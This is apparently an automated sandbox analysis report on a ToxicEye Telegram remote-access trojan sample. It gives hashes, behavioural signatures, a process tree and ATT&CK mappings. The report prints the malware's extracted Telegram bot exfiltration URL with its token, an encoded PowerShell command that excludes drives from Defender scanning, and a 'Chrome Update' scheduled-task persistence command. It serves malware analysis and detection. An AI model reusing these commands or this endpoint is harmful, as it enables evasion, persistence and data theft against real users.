Analysis
-
max time kernel
36s -
max time network
38s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
06-10-2024 21:12
Static task
static1
Behavioral task
behavioral1
Sample
J9cvjahsghfAP2s.exe
Resource
win10-20240611-en
Errors
General
-
Target
J9cvjahsghfAP2s.exe
-
Size
16.3MB
-
MD5
0392831eef744779930426841e250ec0
-
SHA1
f9d7d82a92bdc7c8598d393edae73ca1b6ed015e
-
SHA256
a65b1b62f767ef61e1711c0a83157c1e1d01e0c2eace65e616c837fc1e44dbe7
-
SHA512
dbd9e9020ba51db9a71cd435894581e3f1260436cf7690783df00917bce815a2bec45c85592c16eb5aa75937c6cbcd1959f4d95de510cc3174945d3186f74b42
-
SSDEEP
393216:914I2ZOl6M5PdlNYHeWcHXe0xE6TNJWAikay8d+Lc0xk3S1vk:b4I2bM9dlN+XsXesESJWZd+LFki1
Malware Config
Extracted
toxiceye
https://api.telegram.org/bot7642478923:AAEwlRnbjjNP8kHPrxLhm3a8vkSUNuUfWL0/sendMessage?chat_id=7824954161
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ GcYPoQg2gjwx.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion GcYPoQg2gjwx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion GcYPoQg2gjwx.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation J9cvjahsghfAP2s.exe Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation TelegramRAT.exe Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation rat.exe -
Executes dropped EXE 3 IoCs
pid Process 1656 TelegramRAT.exe 3516 GcYPoQg2gjwx.exe 1896 rat.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA GcYPoQg2gjwx.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 45 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 824 tasklist.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language J9cvjahsghfAP2s.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4980 timeout.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3520 schtasks.exe 3640 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1896 rat.exe -
Suspicious behavior: EnumeratesProcesses 22 IoCs
pid Process 4388 powershell.exe 4388 powershell.exe 1896 rat.exe 1896 rat.exe 1896 rat.exe 1896 rat.exe 1896 rat.exe 1896 rat.exe 1896 rat.exe 1896 rat.exe 1896 rat.exe 1896 rat.exe 1896 rat.exe 1896 rat.exe 1896 rat.exe 1896 rat.exe 1896 rat.exe 1896 rat.exe 1896 rat.exe 1896 rat.exe 1896 rat.exe 1896 rat.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3516 GcYPoQg2gjwx.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 1656 TelegramRAT.exe Token: SeDebugPrivilege 4388 powershell.exe Token: SeDebugPrivilege 824 tasklist.exe Token: SeDebugPrivilege 1896 rat.exe Token: SeSystemEnvironmentPrivilege 3516 GcYPoQg2gjwx.exe Token: SeDebugPrivilege 1896 rat.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3516 GcYPoQg2gjwx.exe 1896 rat.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 2112 wrote to memory of 4388 2112 J9cvjahsghfAP2s.exe 84 PID 2112 wrote to memory of 4388 2112 J9cvjahsghfAP2s.exe 84 PID 2112 wrote to memory of 4388 2112 J9cvjahsghfAP2s.exe 84 PID 2112 wrote to memory of 1656 2112 J9cvjahsghfAP2s.exe 86 PID 2112 wrote to memory of 1656 2112 J9cvjahsghfAP2s.exe 86 PID 2112 wrote to memory of 3516 2112 J9cvjahsghfAP2s.exe 88 PID 2112 wrote to memory of 3516 2112 J9cvjahsghfAP2s.exe 88 PID 1656 wrote to memory of 3520 1656 TelegramRAT.exe 90 PID 1656 wrote to memory of 3520 1656 TelegramRAT.exe 90 PID 1656 wrote to memory of 4504 1656 TelegramRAT.exe 92 PID 1656 wrote to memory of 4504 1656 TelegramRAT.exe 92 PID 4504 wrote to memory of 824 4504 cmd.exe 94 PID 4504 wrote to memory of 824 4504 cmd.exe 94 PID 4504 wrote to memory of 4116 4504 cmd.exe 95 PID 4504 wrote to memory of 4116 4504 cmd.exe 95 PID 4504 wrote to memory of 4980 4504 cmd.exe 96 PID 4504 wrote to memory of 4980 4504 cmd.exe 96 PID 4504 wrote to memory of 1896 4504 cmd.exe 97 PID 4504 wrote to memory of 1896 4504 cmd.exe 97 PID 1896 wrote to memory of 3640 1896 rat.exe 99 PID 1896 wrote to memory of 3640 1896 rat.exe 99 PID 3516 wrote to memory of 1988 3516 GcYPoQg2gjwx.exe 101 PID 3516 wrote to memory of 1988 3516 GcYPoQg2gjwx.exe 101 PID 3516 wrote to memory of 1988 3516 GcYPoQg2gjwx.exe 101 PID 3516 wrote to memory of 624 3516 GcYPoQg2gjwx.exe 102 PID 3516 wrote to memory of 624 3516 GcYPoQg2gjwx.exe 102 PID 3516 wrote to memory of 624 3516 GcYPoQg2gjwx.exe 102 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\J9cvjahsghfAP2s.exe"C:\Users\Admin\AppData\Local\Temp\J9cvjahsghfAP2s.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAZwByACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAcABrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAYwBkACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AdABiACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4388
-
-
C:\Users\Admin\AppData\Local\Temp\TelegramRAT.exe"C:\Users\Admin\AppData\Local\Temp\TelegramRAT.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\ToxicEye\rat.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:3520
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpF56C.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpF56C.tmp.bat3⤵
- Suspicious use of WriteProcessMemory
PID:4504 -
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 1656"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:824
-
-
C:\Windows\system32\find.exefind ":"4⤵PID:4116
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak4⤵
- Delays execution with timeout.exe
PID:4980
-
-
C:\Users\ToxicEye\rat.exe"rat.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\ToxicEye\rat.exe"5⤵
- Scheduled Task/Job: Scheduled Task
PID:3640
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\GcYPoQg2gjwx.exe"C:\Users\Admin\AppData\Local\Temp\GcYPoQg2gjwx.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3516 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\SysWOW64\cmd.exe"3⤵PID:1988
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\SysWOW64\cmd.exe"3⤵PID:624
-
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Obfuscated Files or Information
1Command Obfuscation
1Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
16.2MB
MD5a2cfaecd80aaa319d36ed1c87fc68dce
SHA1d0478f4274090e27fef08869682f7d181bdfdeba
SHA256cab0c3b7a76fe7356253ed309512908ad769068ad57e61a7ee9ea78586750d81
SHA5123233b9c768b7314eebda5b31dce4d4e0160f58b0b750402fcb848c585a74e2d923992952ce20384dc821b788a5acafa6b8e46030d9bdde9328df480391db2fb2
-
Filesize
111KB
MD5cfcf85d457ace60923e67ce7f14adadf
SHA176f9220c256579361542cddde951d6cbb86ca163
SHA2560a2ea2ae3535420da3b3504d3dc9f45067e55c81c3d4e2d483173e05db0fdd3f
SHA512d2554907ea6f236bfefce0c09dcf1a90a171455038b1bc671eeac787938fea1ed7783954550489d6b0375fd9a2a0c794f728c1d81d79fe6600080de4739ab984
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
188B
MD5b1dd8e657c3625a18353b86a16300805
SHA107fe0a6951dd3f253a9760a127f72b0b351fcb0a
SHA256623da7799cae5dc00b4927d5145705036a11765e502c6a2d5552be36e87af571
SHA512827216d8587ab9f2f79119b2eb50b95cc453ea51cd609d9774fd663a0f300f5bae77ab418279c4922340c84dd2d62f16040e978cd027b8ca4b2830b64f664669